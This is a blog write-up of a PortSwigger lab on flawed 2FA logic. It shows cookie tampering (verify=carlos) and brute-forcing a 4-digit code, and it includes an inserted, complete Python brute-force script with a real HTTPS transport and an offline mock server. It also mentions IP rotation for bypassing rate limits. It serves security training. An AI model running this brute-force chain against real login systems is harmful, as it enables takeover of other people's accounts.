Portswigger Academy: 2FA Broken Logic

Jun Takemura · May 22, 2025

2FA Broken Logic

Task

This lab’s two-factor authentication is vulnerable due to its flawed logic. To solve the lab, access Carlos’s account page.

  • Your credentials: wiener:peter
  • Victim’s username: carlos

You also have access to the email server to receive your 2FA verification code.

Attempt

First log in as wiener:peter. Pass the 2FA using the code you got via email.

The POST request that submits the 2FA code carries Cookie: verify=wiener; session=BSHMC8VICpQ5EPuR4NuMvrNeauC6yaYV. The verify cookie is what tells the server whose code is being checked, so I simply changed wiener to carlos and resent the request. (Before doing this you also need to send the GET request for the 2FA page with verify=carlos; that is what makes the server generate a code for carlos.)

Of course the security code I submitted was wrong, so I brute-forced it. The code is only 4 digits, so if there is no rate limit it should be easy to crack: at most 10,000 attempts.

Generate all 4-digit codes and copy them to the clipboard, ready to paste as a payload list:

seq -w 0 9999 | xclip -selection clipboard

Don’t forget the -w option: it pads every number with leading zeros to the same width, so 7 becomes 0007 and the list matches the format the server expects.
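The whole attack in one script, as an added example (this is my code, not the lab’s or the author’s): trigger a code for the victim with a GET carrying verify=carlos, then POST every zero-padded candidate as the 2FA code until the server redirects to the account page. The endpoint /login2, the form field mfa-code and the 302 to /my-account are assumptions about the lab; the page itself only shows the cookie. FakeLab is a constructed stand-in that models just the broken logic (code bound to the verify cookie, no rate limit) so the script runs offline; swap in http_send(host) to talk to the real lab.

```python
import http.client
import random
from typing import Callable, Dict, Iterable, Iterator, Optional, Tuple

Response = Tuple[int, Dict[str, str]]
Send = Callable[[str, str, Dict[str, str], Optional[str]], Response]


def candidate_codes(width: int = 4) -> Iterator[str]:
    """Zero-padded codes 0000..9999, the same list `seq -w 0 9999` produces."""
    for n in range(10 ** width):
        yield f"{n:0{width}d}"


def cookie_header(victim: str, session: str) -> Dict[str, str]:
    # The flaw: the server trusts the verify cookie, not the session, to say
    # whose code is being checked. The session is still our own (wiener's).
    return {"Cookie": f"verify={victim}; session={session}"}


def trigger_code(send: Send, victim: str, session: str) -> int:
    """GET the 2FA page with verify=<victim> so the server issues a code for the victim.
    Assumed endpoint: /login2."""
    status, _ = send("GET", "/login2", cookie_header(victim, session), None)
    return status


def brute_force(send: Send, victim: str, session: str,
                codes: Optional[Iterable[str]] = None) -> Optional[str]:
    """POST every candidate as mfa-code (assumed field name); stop at the first
    302 to /my-account (assumed success signal). Returns the code or None."""
    headers = cookie_header(victim, session)
    headers["Content-Type"] = "application/x-www-form-urlencoded"
    for code in (codes if codes is not None else candidate_codes()):
        status, resp_headers = send("POST", "/login2", headers, f"mfa-code={code}")
        location = next((v for k, v in resp_headers.items() if k.lower() == "location"), "")
        if status == 302 and location.startswith("/my-account"):
            return code
    return None


class FakeLab:
    """Constructed stand-in for the lab server, modelling only the broken logic:
    the code is stored per verify-cookie value, the session cookie is ignored,
    and wrong guesses are never rate limited or locked out."""

    def __init__(self, code: Optional[str] = None) -> None:
        self.codes: Dict[str, str] = {}
        self.fixed = code            # pin the code for deterministic tests
        self.attempts = 0

    @staticmethod
    def _cookies(headers: Dict[str, str]) -> Dict[str, str]:
        out: Dict[str, str] = {}
        for part in headers.get("Cookie", "").split(";"):
            if "=" in part:
                k, v = part.strip().split("=", 1)
                out[k] = v
        return out

    def send(self, method: str, path: str, headers: Dict[str, str],
             body: Optional[str]) -> Response:
        user = self._cookies(headers).get("verify", "")
        if path != "/login2" or not user:
            return 400, {}
        if method == "GET":
            self.codes[user] = self.fixed or f"{random.randrange(10000):04d}"
            return 200, {}
        self.attempts += 1
        form = dict(p.split("=", 1) for p in (body or "").split("&") if "=" in p)
        if form.get("mfa-code") == self.codes.get(user):
            return 302, {"Location": "/my-account"}
        return 200, {}  # wrong code: form re-rendered, try again


def http_send(host: str) -> Send:
    """Real transport for a lab host (assumed HTTPS on 443). Not exercised here."""
    def send(method: str, path: str, headers: Dict[str, str], body: Optional[str]) -> Response:
        conn = http.client.HTTPSConnection(host, timeout=10)
        conn.request(method, path, body=body, headers=headers)
        r = conn.getresponse()
        r.read()
        conn.close()
        return r.status, dict(r.getheaders())
    return send


def crack(send: Send, victim: str = "carlos",
          session: str = "BSHMC8VICpQ5EPuR4NuMvrNeauC6yaYV") -> Optional[str]:
    """Full chain: issue a code for the victim, then guess it."""
    trigger_code(send, victim, session)
    return brute_force(send, victim, session)


if __name__ == "__main__":
    lab = FakeLab()
    print("cracked:", crack(lab.send), "after", lab.attempts, "attempts")
```

Against the real lab, once brute_force returns the code the same session cookie is now treated as carlos’s verified login, so a GET /my-account (assumed path) with that session cookie lands on his account page; at roughly 10,000 requests with no lockout, the whole search is a matter of minutes.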

Thoughts

Brute-forcing a 2FA code sometimes works even on a major website. Take a look at this vulnerability in Instagram: although a rate limit was in place, it could be bypassed with IP rotation and by abusing a race condition.
